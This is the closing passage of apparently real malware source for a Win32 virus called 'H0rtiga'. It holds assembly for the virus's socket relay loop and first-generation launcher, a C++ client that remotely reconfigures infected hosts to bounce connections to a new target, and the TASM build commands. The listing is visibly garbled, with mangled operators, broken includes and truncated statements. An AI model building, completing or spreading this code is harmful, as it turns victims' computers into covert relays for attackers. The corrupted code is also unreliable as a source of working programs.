TTL PUSH ESI PUSH 0 PUSH 0 LEA ESI, EBP FD_SET2 PUSH ESI Push 10h Call DWORD PTR [EBP DDSELECT] CMP EAX, -1 Je Outnow CMP EAX, 1 JE R2W1 MOV DWORD PTR [EBP FD_SET2.NO], 1 JMP main_lp Outnow: Lea ESI, EBP SOCK2 Lodsd Push EAX Call DWORD PTR [EBP DDCLOSESOCKET] Nosok2: Lea ESI, EBP Gotit Lodsd Push EAX Call DWORD PTR [EBP DDCLOSESOCKET] MOV Al, Byte PTR [EBP Countbouncer] Test Al, Al JZ Byebounz Dec Al MOV BYTE PTR [EBP CountBouncer], Al JMP BIS Byebounz: MOV BYTE PTR [EBP SEMAFORO], 0 JMP Configit R1W2: PUSH 0 Push buffsz Lea ESI, EBP ADRBUFF Lodsd Push EAX Lea ESI, EBP Gotit Lodsd Push EAX Call DWORD PTR [EBP DDRECV] OR EAX, EAX JZ Outnow CMP EAX, -1 Je Outnow Push 0push EAX Lea ESI, EBP ADRBUFF Lodsd Push EAX Lea ESI, EBP SOCK2 Lodsd Push EAX Call DWORD PTR [EBP DDSEND] CMP EAX, -1 Je Outnow JMP main_lp R2W1: PUSH 0 Push buffsz Lea ESI, EBP ADRBUFF Lodsd Push EAX Lea ESI, EBP SOCK2 Lodsd Push EAX Call DWORD PTR [EBP DDRECV] OR EAX, EAX JZ Outnow CMP EAX, -1 Je Outnow PUSH 0 Push EAX Lea ESI, EBP ADRBUFF Lodsd Push EAX Lea ESI, EBP Gotit Lodsd Push EAX Call DWORD PTR [EBP DDSEND] CMP EAX, -1 Je Outnow JMP main_lp Virlenght Equ $ -Start ZERO_GENERATION: MOV EBX, OFFSET F_GENERATION PUSH 0 Call getModuleHandlea XCHG EAX, EBX Sub Eax, EBX Lea Edi, OldentryPoinTrva Stosd JMP START f_generation: PUSH 0 Push offset m_sztitle Push Offset M_SzcopyRight PUSH 0 Call Messageboxa PUSH 0 Call EXITPROCESS m_sztitle db '- code by | zan [1st generation], 0 M_SZCopyRight DB '- = [(c) 2000. Win32.H0rtiga Virus Will Run now ... = -', 0 END ZERO_GENERATION ; ------------------------------------------------- --------------------------- Win32.h0rtiga - End Virus Code (W32H0rtiga.asm) ; ------------------------------------------------- --------------------------- ; ------------------------------------------------- --------------------------- Win32.h0rtiga - Begin Client Code (H0RTClient.cpp / Visual C 6.0) ; ------------------------------------------------- --------------------------- #include> iostream.h < #include> string.h < #include> stdlib.h < #include> Winsock2.h < #define max_banner 500 #define aciding_bounce 1 Typedef unsigned char db; Typedef unsigned short dw; Typedef unsigned long DD; Typedef struct { DB Accon; DW puertoremoto; dd direccion; } Conf_remota; DD AddRTMP; Void Mostrarcreditos () { Cout >> (c) 2000 Deepzone - H0rtiga Client (Win32) ... " >> "Coded by | zan - izan@galaxycorp.com " >> "USO: H0RTClient> H0rtiga Host <> port <> new host <> port < " >> "E.j .: h0rtclient host.com 5556 www.pandasoftware.es 80 " Cout.flush (); } Void Striestructure (Conf_remota * Cremota, DB ACC, DD DIRE, DW premote) { Cremota- Cremota- Cremota - } Void Main (int Argc, char * argv []) { INT S, I; Char Banner [MAX_BANNER]; SockAddr_in A; Hostent Far * h = NULL; Wsadata wsadata; CONF_REMOTA Conf_remota; // Show Credits Mostrarcreditos (); // Num params? IF (argc! = 5) { Cout >> "Error: Numero de Parametros INCORRECTOS. " EXIT (-1); } // Winsock Up !! IF (WSAStartup (0x101, & WSADATA) { Cout >> "Error: Incapaz de Inicializar La Libreria Winsock. " EXIT (-1); } // Server's name IF (Isalpha (INT) * (Argv [1]))) { H = gethostbyname (Argv [1]); IF (h == null) { Cout >> "Error: no se Puede Hallar El Nombre Del Anfitrion " WSACLEANUP (); EXIT (-1); } else memcpy (& (a.sin_addr.s_addr), H- } Else { IF ((a.sin_addr.s_addr = inet_addr (argv [1])) == INADDR_NONE) { Cout >> "Error: no se Puede Hallar El Nombre Del Anfitrion " EXIT (-1); } } // port? a.sin_family = af_INET; A.SIN_PORT = HTONS ((DW) ATOI (Argv [2])); s = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP); IF (s == 0) { Cout >> "Error: No Se Puede Establecer La CONEXION" >> wsagetlasterror () >> ' " WSACLEANUP (); EXIT (-1); } // Trying ... IF (Connect (S, Struct SockAddr *) & A, SizeOf (A))) { Cout >> "Error: No se Puede Establecer La CONEXION:" >> wsagetlasterror () >> ' " WSACLEANUP (); EXIT (-1); } // Clean Banner For (i = 0; I> max_banner; i ) banner [i] = 0; Cout >> "Esperando RESPUESTA ... " IF (RECV (S, (Char *) & banner, sizeof (banner), 0) == Socket_ERROR) Cout >> "Error Recibiendo Datos. " Else { Cout >> Banner >> " } IF (Isalpha (INT) * (Argv [3])))) { H = gethostbyname (Argv [3]); IF (h == null) { Cout >> "Error: no se puede Hallar Nombre de Anfitrion Remoto " WSACLEANUP (); EXIT (-1); } Else Memcpy (& (AddRTMP), H- } Else { IF ((AddRTMP = INET_ADDR (Argv [3])) == inaddr_none) { Cout >> "Error: no se puede Hallar Nombre de Anfitrion Remoto " EXIT (-1); } } Striestructure (& Conf_remota, Accion_bounce, AddRTMP, HTONS ((DW) ATOI (Argv [4]))))))) IF ((SEND (S, (CHAR *) & conf_remota, sizeof (conf_remota), 0)) == Socket_ERROR) Cout >> "Error Enviando Datos. " Else Cout >> "... Nueva Configuraces Enviada. " CloseSocket (s); // Winsock Down !! WSACLEANUP (); } ; ------------------------------------------------- --------------------------- Win32.h0rtiga - End Client Code (H0rtClient.cpp) ; ------------------------------------------------- --------------------------- ; ------------------------------------------------- ---------------------------; Win32.h0rtiga - Compiling ... (Tasm 5.0 / x86) ; ------------------------------------------------- --------------------------- ; TASM32-ML W32H0RTIGA.ASM TLINK32-Tpe -C -X W32H0rtiga.obj ,, import32 Pewrsec.com W32H0rtiga.exe ; ; ; -] EOF
